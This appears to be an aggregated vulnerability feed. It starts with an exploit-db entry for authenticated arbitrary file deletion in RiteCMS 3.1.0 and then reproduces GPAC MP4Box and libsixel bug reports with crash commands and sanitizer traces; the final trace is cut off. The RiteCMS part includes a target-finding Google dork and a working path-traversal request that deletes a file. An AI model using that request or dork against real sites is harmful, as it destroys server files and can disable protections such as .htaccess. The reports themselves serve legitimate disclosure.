RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion via path traversal vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain web server security mechanisms such as deleting .htaccess file that would deactivate those security constraints.

    # Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
    # Date: 25/07/2021
    # Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
    # Vendor Homepage: https://ritecms.com/
    # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
    # Version: <= 3.1.0
    # Google Dork: intext:"Powered by RiteCMS"
    # Tested on: Windows 10, Ubuntu 18, XAMPP
    # Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd
    
    
    ################
    # Description  #
    ################
    
    # RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.
    
    
    #####################################################
    # PoC to delete secretConfig.conf file in web root  #
    #####################################################
    
    
    Steps to Reproduce:
    
    1. Login as admin
    2. Go to File Manager
    3. Delete any file
    4. Intercept the request and replace current file name to any files on the server via parameter "delete".
    
    # Assumed there is a secretConfig.conf file in web root
    
    PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf"
    
    Request:
    ========
    
    GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager
    Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Sec-GPC: 1

CVE-2022-24248: Offensive Security’s Exploit Database Archive

GPAC mp4box 1.1.0-DEV-rev1727-g8be34973d-master has a stack-overflow vulnerability in function gf_isom_get_sample_for_movie_time of mp4box.

CVE-2022-27145: There is a statck-overflow detected by AddressSanitizer · Issue #2108 · gpac/gpac

GPAC mp4box 1.1.0-DEV-rev1663-g881c6a94a-master is vulnerable to Integer Overflow.

**Description**

There are some signed-integer-overflow caused runtime error and are detected by UndefinedBehaviorSanitizer

**System info**

    Ubuntu 20.04.2 LTS
    clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71
    MP4Box - GPAC version 1.1.0-DEV-rev1663-g881c6a94a-master
    

**Build command**

    ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++
    

**Crash command**

MP4Box -isma -timescale 600 -out /dev/null poc\_file

**Pocs**

POCs

**Crash output**

poc\_3

    media_tools/av_parsers.c:5271:24: runtime error: signed integer overflow: 160041545 * 16 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior media_tools/av_parsers.c:5271:24 in /zhengjie/collect/collec.sh: line 13:  9327 Aborted (core dumped) 
    

poc\_9

    [iso file] Box "oinf" size 15 (start 0) invalid (read 18)
    [iso file] Unknown top-level box type )85B691
    [ODF] Error reading descriptor (tag 2 size 1): Invalid MPEG-4 Descriptor
    [iso file] Box "sinf" (start 635) has 81 extra bytes
    [ODF] Error reading descriptor (tag 2 size 1): Invalid MPEG-4 Descriptor
    [ODF] Not enough bytes (11) to read descriptor (size=81)
    [ODF] Error reading descriptor (tag 2 size 17): Invalid MPEG-4 Descriptor
    [iso file] Box "stco" (start 859) has 239 extra bytes
    [iso file] Box "stco" is larger than container box
    [iso file] Box "stbl" size 339 (start 536) invalid (read 578)
    [iso file] Unknown box type mvex in parent minf
    [iso file] Unknown box type moov in parent minf
    [iso file] Unknown box type 00000000 in parent minf
    [iso file] Unknown box type u7Fl  in parent minf
    media_tools/av_parsers.c:5271:24: runtime error: signed integer overflow: 551209680 * 16 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior media_tools/av_parsers.c:5271:24 in /zhengjie/collect/collec.sh: line 13: 16205 Aborted (core dumped)
    

poc\_19

    media_tools/av_parsers.c:5271:24: runtime error: signed integer overflow: 414855863 * 16 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior media_tools/av_parsers.c:5271:24 in /zhengjie/collect/collec.sh: line 13: 27854 Aborted (core dumped)

CVE-2022-27148: Signed integer overflow · Issue #2067 · gpac/gpac

GPAC mp4box 1.1.0-DEV-rev1727-g8be34973d-master has a use-after-free vulnerability in function gf_node_get_attribute_by_tag.

**Description**

There is a use-after-free detected by AddressSanitizer

**System info**

    Ubuntu 20.04.2 LTS
    clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71
    MP4Box - GPAC version 1.1.0-DEV-rev1727-g8be34973d-master
    

**Build command**

    ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++
    

**crash command**

    MP4Box -lsr -out /dev/null poc_file
    

**Pocs**

poc.zip

**Crash output**

    ==28733==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000002bc0 at pc 0x000000721f36 bp 0x7ffec8945940 sp 0x7ffec8945938
    READ of size 2 at 0x603000002bc0 thread T0
        #0 0x721f35 in gf_node_get_attribute_by_tag/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:934:18
        #1 0x70ca13 in gf_dom_listener_del/programs/mp4box/builds/build10/src/scenegraph/dom_events.c:161:6
        #2 0x70ccaa in gf_dom_event_remove_all_listeners/programs/mp4box/builds/build10/src/scenegraph/dom_events.c:196:3
        #3 0x5c54f5 in gf_node_free/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:1601:4
        #4 0x6dac25 in gf_svg_node_del/programs/mp4box/builds/build10/src/scenegraph/svg_types.c:126:2
        #5 0x5bf0f1 in gf_node_unregister/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:761:3
        #6 0x5bfb17 in gf_sg_reset/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:479:3
        #7 0x5be86d in gf_sg_del/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:162:2
        #8 0x4eba5d in dump_isom_scene/programs/mp4box/builds/build10/applications/mp4box/filedump.c:221:2
        #9 0x4e0bda in mp4boxMain/programs/mp4box/builds/build10/applications/mp4box/main.c:6146:7
        #10 0x7f9d3ecb80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #11 0x41ea6d in _start (/zhengjie/cmdline-fuzz/programs/mp4box/builds/build10/bin/gcc/MP4Box+0x41ea6d)
    
    0x603000002bc0 is located 0 bytes inside of 24-byte region [0x603000002bc0,0x603000002bd8)
    freed by thread T0 here:
        #0 0x499a62 in free (/zhengjie/cmdline-fuzz/programs/mp4box/builds/build10/bin/gcc/MP4Box+0x499a62)
        #1 0x7215a7 in gf_node_delete_attributes/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:728:3
        #2 0x6dac15 in gf_svg_node_del/programs/mp4box/builds/build10/src/scenegraph/svg_types.c:124:2
        #3 0x5bf0f1 in gf_node_unregister/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:761:3
        #4 0x5bfb17 in gf_sg_reset/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:479:3
        #5 0x5be86d in gf_sg_del/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:162:2
        #6 0x4eba5d in dump_isom_scene/programs/mp4box/builds/build10/applications/mp4box/filedump.c:221:2
        #7 0x4e0bda in mp4boxMain/programs/mp4box/builds/build10/applications/mp4box/main.c:6146:7
        #8 0x7f9d3ecb80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    previously allocated by thread T0 here:
        #0 0x499ccd in malloc (/zhengjie/cmdline-fuzz/programs/mp4box/builds/build10/bin/gcc/MP4Box+0x499ccd)
        #1 0x72217c in gf_node_create_attribute_from_datatype/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:737:2
        #2 0x72217c in gf_xml_create_attribute/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:541:9
        #3 0x72217c in gf_node_get_attribute_by_tag/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:946:9
        #4 0xaf1c3f in lsr_read_rare_full/programs/mp4box/builds/build10/src/laser/lsr_dec.c:1446:21
        #5 0xaf01c7 in lsr_read_listener/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4355:2
        #6 0xb00747 in lsr_read_scene_content_model/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4600:7
        #7 0xaff8a0 in lsr_read_group_content/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4785:8
        #8 0xaeb4d9 in lsr_read_rectClip/programs/mp4box/builds/build10/src/laser/lsr_dec.c:3987:2
        #9 0xb00752 in lsr_read_scene_content_model/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4519:7
        #10 0xaff8a0 in lsr_read_group_content/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4785:8
        #11 0xae55a4 in lsr_read_svg/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4192:2
        #12 0xadf7ae in lsr_read_command_list/programs/mp4box/builds/build10/src/laser/lsr_dec.c:5886:9
        #13 0xaddbfb in lsr_decode_laser_unit/programs/mp4box/builds/build10/src/laser/lsr_dec.c:6133:6
        #14 0xade67f in gf_laser_decode_command_list/programs/mp4box/builds/build10/src/laser/lsr_dec.c:230:6
        #15 0xa356af in gf_sm_load_run_isom/programs/mp4box/builds/build10/src/scene_manager/loader_isom.c:307:10
        #16 0x4eb9a1 in dump_isom_scene/programs/mp4box/builds/build10/applications/mp4box/filedump.c:203:14
        #17 0x4e0bda in mp4boxMain/programs/mp4box/builds/build10/applications/mp4box/main.c:6146:7
        #18 0x7f9d3ecb80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-use-after-free/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:934:18 in gf_node_get_attribute_by_tag
    Shadow bytes around the buggy address:
      0x0c067fff8520: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
      0x0c067fff8530: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
      0x0c067fff8540: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd
      0x0c067fff8550: fd fa fa fa fd fd fd fa fa fa fd fd fd fd fa fa
      0x0c067fff8560: fd fd fd fa fa fa fd fd fd fa fa fa 00 00 00 fa
    =>0x0c067fff8570: fa fa fd fd fd fd fa fa[fd]fd fd fa fa fa fd fd
      0x0c067fff8580: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa
      0x0c067fff8590: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
      0x0c067fff85a0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
      0x0c067fff85b0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
      0x0c067fff85c0: fd fd fd fa fa fa fd fd fd fd fa fa fd fd fd fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==28733==ABORTING

CVE-2022-27147: There is a use-after-free detected by AddressSanitizer · Issue #2109 · gpac/gpac

GPAC mp4box 1.1.0-DEV-rev1759-geb2d1e6dd-has a heap-buffer-overflow vulnerability in function gf_isom_apple_enum_tag.

**Description**

There is a heap buffer overflow detected by AddressSanitizer

**System info**

    Ubuntu 20.04.2 LTS
    clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71
    MP4Box - GPAC version 1.1.0-DEV-rev1759-geb2d1e6dd-master
    

**Build command**

    ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++
    

**crash command**

    MP4Box -frag 1 -out /dev/null poc_file
    

**Pocs**

poc.zip

**Crash output**

    ==36294==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000014f5 at pc 0x0000007ed95d bp 0x7fff9dbe5110 sp 0x7fff9dbe5108
    READ of size 1 at 0x6020000014f5 thread T0
        #0 0x7ed95c in gf_isom_apple_enum_tag /programs/mp4box/builds/build15/src/isomedia/isom_read.c:4347:9
        #1 0x1578ec6 in isor_declare_track /programs/mp4box/builds/build15/src/filters/isoffin_load.c:787:8
        #2 0x1583b47 in isor_declare_objects /programs/mp4box/builds/build15/src/filters/isoffin_load.c:1453:3
        #3 0xd05c0d in isoffin_initialize /programs/mp4box/builds/build15/src/filters/isoffin_read.c:485:8
        #4 0xb74a43 in gf_filter_new_finalize /programs/mp4box/builds/build15/src/filter_core/filter.c:441:8
        #5 0xb73120 in gf_filter_new /programs/mp4box/builds/build15/src/filter_core/filter.c:395:7
        #6 0xb5e1bb in gf_fs_load_filter_internal /programs/mp4box/builds/build15/src/filter_core/filter_session.c:1293:13
        #7 0x911528 in gf_media_fragment_file /programs/mp4box/builds/build15/src/media_tools/isom_tools.c:3789:6
        #8 0x4e6fdc in mp4boxMain /programs/mp4box/builds/build15/applications/mp4box/main.c:6439:7
        #9 0x7f7b5af220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #10 0x41ea6d in _start (/programs/mp4box/builds/build15/bin/gcc/MP4Box+0x41ea6d)
    
    0x6020000014f5 is located 0 bytes to the right of 5-byte region [0x6020000014f0,0x6020000014f5)
    allocated by thread T0 here:
        #0 0x499ccd in malloc (/programs/mp4box/builds/build15/bin/gcc/MP4Box+0x499ccd)
        #1 0x12c648d in databox_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_apple.c:247:22
        #2 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #3 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #4 0x12c53c3 in ilst_item_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_apple.c:114:7
        #5 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #6 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #7 0x12c4d35 in ilst_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_apple.c:47:8
        #8 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #9 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #10 0x7affe3 in gf_isom_box_array_read_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1719:7
        #11 0x132290a in meta_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_meta.c:106:13
        #12 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #13 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #14 0x7affe3 in gf_isom_box_array_read_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1719:7
        #15 0x12f6245 in udta_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_base.c:8075:13
        #16 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #17 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #18 0x7affe3 in gf_isom_box_array_read_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1719:7
        #19 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9
        #20 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14
        #21 0x7ad3c1 in gf_isom_parse_root_box /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:38:8
        #22 0x7c8dc1 in gf_isom_parse_movie_boxes_internal /programs/mp4box/builds/build15/src/isomedia/isom_intern.c:351:7
        #23 0x7c8dc1 in gf_isom_parse_movie_boxes /programs/mp4box/builds/build15/src/isomedia/isom_intern.c:814:6
        #24 0x7cd1a6 in gf_isom_open_file /programs/mp4box/builds/build15/src/isomedia/isom_intern.c:934:19
        #25 0x4e14d6 in mp4boxMain /programs/mp4box/builds/build15/applications/mp4box/main.c:5968:12
        #26 0x7f7b5af220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /programs/mp4box/builds/build15/src/isomedia/isom_read.c:4347:9 in gf_isom_apple_enum_tag
    Shadow bytes around the buggy address:
      0x0c047fff8240: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00
      0x0c047fff8250: fa fa 00 00 fa fa 00 00 fa fa 00 04 fa fa 00 fa
      0x0c047fff8260: fa fa 00 00 fa fa 00 00 fa fa 01 fa fa fa 00 00
      0x0c047fff8270: fa fa 00 05 fa fa 00 00 fa fa 00 01 fa fa 00 00
      0x0c047fff8280: fa fa 00 00 fa fa 02 fa fa fa 00 00 fa fa 00 02
    =>0x0c047fff8290: fa fa 00 00 fa fa 00 04 fa fa 00 00 fa fa[05]fa
      0x0c047fff82a0: fa fa 00 00 fa fa 02 fa fa fa 00 00 fa fa 00 fa
      0x0c047fff82b0: fa fa 00 00 fa fa 00 00 fa fa 06 fa fa fa 00 00
      0x0c047fff82c0: fa fa 02 fa fa fa 00 00 fa fa 02 fa fa fa 00 00
      0x0c047fff82d0: fa fa 03 fa fa fa 00 00 fa fa 02 fa fa fa 00 00
      0x0c047fff82e0: fa fa 00 00 fa fa 00 03 fa fa 00 00 fa fa 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==36294==ABORTING

CVE-2022-27146: There is a heap buffer overflow detected by AddressSanitizer · Issue #2120 · gpac/gpac

libsixel before 1.10 is vulnerable to Buffer Overflow in libsixel/src/quant.c:867.

Hi,I found a heap-buffer-overflow in the current master 705d991  
It sames with the saitoha/libsixel/issue#156 (I found this problem 2 days ago)

OS: Ubuntu 20.04.3 LTS x86\_64  
Kernel: 5.11.0-27-generic

POC: poc.zip

It's the command line's report:

    $ ./img2sixel -o ./a.sixel -7 -p 1 -C 5 -d stucki -E size poc
    double free or corruption (out)
    Aborted
    
    

and here is the ASAN report for saitoha/libsixel (the current master \[6a5be8b\]):

    $ ./img2sixel -o ./a.sixel -7 -p 1 -C 5 -d stucki -E size ~/Downloads/poc
    =================================================================
    ==2216856==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62e00000c3fd at pc 0x7ffff74e5a7e bp 0x7fffffffc340 sp 0x7fffffffc330
    READ of size 1 at 0x62e00000c3fd thread T0
        #0 0x7ffff74e5a7d in error_diffuse /home/wulearn/Desktop/testtt/libsixel/src/quant.c:876
        #1 0x7ffff74e6027 in diffuse_stucki /home/wulearn/Desktop/testtt/libsixel/src/quant.c:1002
        #2 0x7ffff74e8154 in sixel_quant_apply_palette /home/wulearn/Desktop/testtt/libsixel/src/quant.c:1417
        #3 0x7ffff74eab2b in sixel_dither_apply_palette /home/wulearn/Desktop/testtt/libsixel/src/dither.c:801
        #4 0x7ffff74d9d9c in sixel_encode_dither /home/wulearn/Desktop/testtt/libsixel/src/tosixel.c:830
        #5 0x7ffff74e1c75 in sixel_encode /home/wulearn/Desktop/testtt/libsixel/src/tosixel.c:1551
        #6 0x7ffff7535f3b in sixel_encoder_output_without_macro /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:825
        #7 0x7ffff75371e2 in sixel_encoder_encode_frame /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1056
        #8 0x7ffff753b0af in load_image_callback /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1679
        #9 0x7ffff752b085 in load_with_builtin /home/wulearn/Desktop/testtt/libsixel/src/loader.c:963
        #10 0x7ffff752b5cb in sixel_helper_load_image_file /home/wulearn/Desktop/testtt/libsixel/src/loader.c:1418
        #11 0x7ffff753b513 in sixel_encoder_encode /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1743
        #12 0x555555558a3b in main /home/wulearn/Desktop/testtt/libsixel/converters/img2sixel.c:457
        #13 0x7ffff72c60b2 in __libc_start_main (/usr/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #14 0x55555555638d in _start (/home/wulearn/Desktop/testtt/libsixel/converters/.libs/img2sixel+0x238d)
    
    0x62e00000c3fd is located 3 bytes to the left of 47208-byte region [0x62e00000c400,0x62e000017c68)
    allocated by thread T0 here:
        #0 0x7ffff76a2bc8 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x555555558c4e in rpl_malloc /home/wulearn/Desktop/testtt/libsixel/converters/malloc_stub.c:45
        #2 0x7ffff7549243 in sixel_allocator_malloc /home/wulearn/Desktop/testtt/libsixel/src/allocator.c:162
        #3 0x7ffff7535cab in sixel_encoder_output_without_macro /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:789
        #4 0x7ffff75371e2 in sixel_encoder_encode_frame /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1056
        #5 0x7ffff753b0af in load_image_callback /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1679
        #6 0x7ffff752b085 in load_with_builtin /home/wulearn/Desktop/testtt/libsixel/src/loader.c:963
        #7 0x7ffff752b5cb in sixel_helper_load_image_file /home/wulearn/Desktop/testtt/libsixel/src/loader.c:1418
        #8 0x7ffff753b513 in sixel_encoder_encode /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1743
        #9 0x555555558a3b in main /home/wulearn/Desktop/testtt/libsixel/converters/img2sixel.c:457
        #10 0x7ffff72c60b2 in __libc_start_main (/usr/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/wulearn/Desktop/testtt/libsixel/src/quant.c:876 in error_diffuse
    Shadow bytes around the buggy address:
      0x0c5c7fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c5c7fff9870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
      0x0c5c7fff9880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff9890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff98a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff98b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff98c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2216856==ABORTING
    
    

It happens on:  
https://github.com/saitoha/libsixel/blob/6a5be8b72d84037b83a5ea838e17bcf372ab1d5f/src/quant.c#L1002

same with:  

error\_diffuse(data, pos + width \* 1 - 2, depth, error, 1, 24);

when x=0, y=0, width=1,then

gdb info:  
![image](https://user-images.githubusercontent.com/43570004/131661031-3f3ff180-cf8f-409b-a54b-df4b885f4d2c.png)

In this position,\[r13+rcx\*1+0x0\] will be `0x100000000000f7e6d` =>`0xf7e6d`  
So,writing to data will cause `overflow`  
and then it writes to a location (chunk) in the heap that should not be written to.

heap info:  
Before:

    0xf5fda0            0x0                 0x60                 Freed                0x0              None
    0xf5fe00            0x0                 0x8060               Used                None              None
    0xf67e60            0x0                 0x70                 Used                None              None
    0xf67ed0            0x0                 0x30                 Used                None              None
    0xf67f00            0x0                 0x10010              Used                None              None
    0xf77f10            0x0                 0x7eb0               Freed     0x7ffff7c9cbe0    0x7ffff7c9cbe0
    0xf7fdc0            0x7eb0              0xd0                 Freed                0x0              None
    
    

After:

    0xf5fda0            0x0                 0x60                 Freed                0x0              None
    0xf5fe00            0x0                 0x8060               Used                None              None
    Corrupt ?!

CVE-2021-40656: heap-buffer-overflow in libsixel/src/quant.c:867 · Issue #25 · libsixel/libsixel

libsixel 1.8.6 is affected by Buffer Overflow in libsixel/src/quant.c:876.

Hi,I found a heap-buffer-overflow in the current master 6a5be8b  
I build `img2sixel` with `ASAN`,this is ASAN report.

OS: Ubuntu 20.04.3 LTS x86\_64  
Kernel: 5.11.0-27-generic

POC: poc.zip

    $ ./img2sixel -o ./a.sixel -7 -p 1 -C 5 -d stucki -E size ~/Downloads/poc
    =================================================================
    ==2216856==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62e00000c3fd at pc 0x7ffff74e5a7e bp 0x7fffffffc340 sp 0x7fffffffc330
    READ of size 1 at 0x62e00000c3fd thread T0
        #0 0x7ffff74e5a7d in error_diffuse /home/wulearn/Desktop/testtt/libsixel/src/quant.c:876
        #1 0x7ffff74e6027 in diffuse_stucki /home/wulearn/Desktop/testtt/libsixel/src/quant.c:1002
        #2 0x7ffff74e8154 in sixel_quant_apply_palette /home/wulearn/Desktop/testtt/libsixel/src/quant.c:1417
        #3 0x7ffff74eab2b in sixel_dither_apply_palette /home/wulearn/Desktop/testtt/libsixel/src/dither.c:801
        #4 0x7ffff74d9d9c in sixel_encode_dither /home/wulearn/Desktop/testtt/libsixel/src/tosixel.c:830
        #5 0x7ffff74e1c75 in sixel_encode /home/wulearn/Desktop/testtt/libsixel/src/tosixel.c:1551
        #6 0x7ffff7535f3b in sixel_encoder_output_without_macro /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:825
        #7 0x7ffff75371e2 in sixel_encoder_encode_frame /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1056
        #8 0x7ffff753b0af in load_image_callback /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1679
        #9 0x7ffff752b085 in load_with_builtin /home/wulearn/Desktop/testtt/libsixel/src/loader.c:963
        #10 0x7ffff752b5cb in sixel_helper_load_image_file /home/wulearn/Desktop/testtt/libsixel/src/loader.c:1418
        #11 0x7ffff753b513 in sixel_encoder_encode /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1743
        #12 0x555555558a3b in main /home/wulearn/Desktop/testtt/libsixel/converters/img2sixel.c:457
        #13 0x7ffff72c60b2 in __libc_start_main (/usr/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #14 0x55555555638d in _start (/home/wulearn/Desktop/testtt/libsixel/converters/.libs/img2sixel+0x238d)
    
    0x62e00000c3fd is located 3 bytes to the left of 47208-byte region [0x62e00000c400,0x62e000017c68)
    allocated by thread T0 here:
        #0 0x7ffff76a2bc8 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x555555558c4e in rpl_malloc /home/wulearn/Desktop/testtt/libsixel/converters/malloc_stub.c:45
        #2 0x7ffff7549243 in sixel_allocator_malloc /home/wulearn/Desktop/testtt/libsixel/src/allocator.c:162
        #3 0x7ffff7535cab in sixel_encoder_output_without_macro /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:789
        #4 0x7ffff75371e2 in sixel_encoder_encode_frame /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1056
        #5 0x7ffff753b0af in load_image_callback /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1679
        #6 0x7ffff752b085 in load_with_builtin /home/wulearn/Desktop/testtt/libsixel/src/loader.c:963
